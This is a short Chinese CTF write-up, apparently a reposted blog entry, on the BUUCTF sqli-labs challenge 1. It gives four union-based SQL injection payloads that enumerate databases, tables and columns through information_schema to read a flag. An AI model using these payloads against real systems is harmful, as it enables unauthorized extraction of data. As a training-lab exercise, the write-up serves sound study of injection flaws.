当前位置: 首页 > article >正文

BUUCTF sqli-labs 1

article 2025/1/7 14:17:06

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

 这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+


http://www.kler.cn/a/468111.html

相关文章:

  • HashMap总结使用+原理+面试
  • 鸿蒙操作系统(HarmonyOS)
  • Unity性能优化总结
  • [答疑]用例规约:系统请求3dsMax创建体块
  • 【机器学习:一、机器学习简介】
  • 使用 Try-With-Resources 简化资源管理
  • 不只是mini-react第一节:实现最简单mini-react
  • C#—SynchronizationContext类详解 (同步上下文)
  • hashMap追问
  • Python 中利用装饰器实现多线程函数调用示例
  • 利用Deeplearning4j进行 图像识别
  • Quartus与Synopsys联合调试
  • Golang中的通道和缓冲区
  • 计算机网络相关术语
  • 2025加密风云:行业变革与未来趋势全景透视
  • 2025/1/4期末复习 密码学 按老师指点大纲复习
  • 【51项目】51单片机自制小霸王游戏机
  • 【SpringBoot3】Spring Boot 3.0 集成 Mybatis Plus
  • 医学图像分析工具02:3D Slicer || 医学影像可视化与分析工具 支持第三方插件
  • AI辅助的运维流程自动化:实现智能化管理的新篇章
  • connect to host github.com port 22: Connection timed out 的解决方法
  • R语言的数据结构
  • 城市供水管网多普勒超声波流量计,保障供水安全
  • 【游戏设计原理】46 - 魔杖
  • 一种新的混合大模型架构:TITAN
  • 【Python运维】使用Python与Docker进行高效的容器化应用管理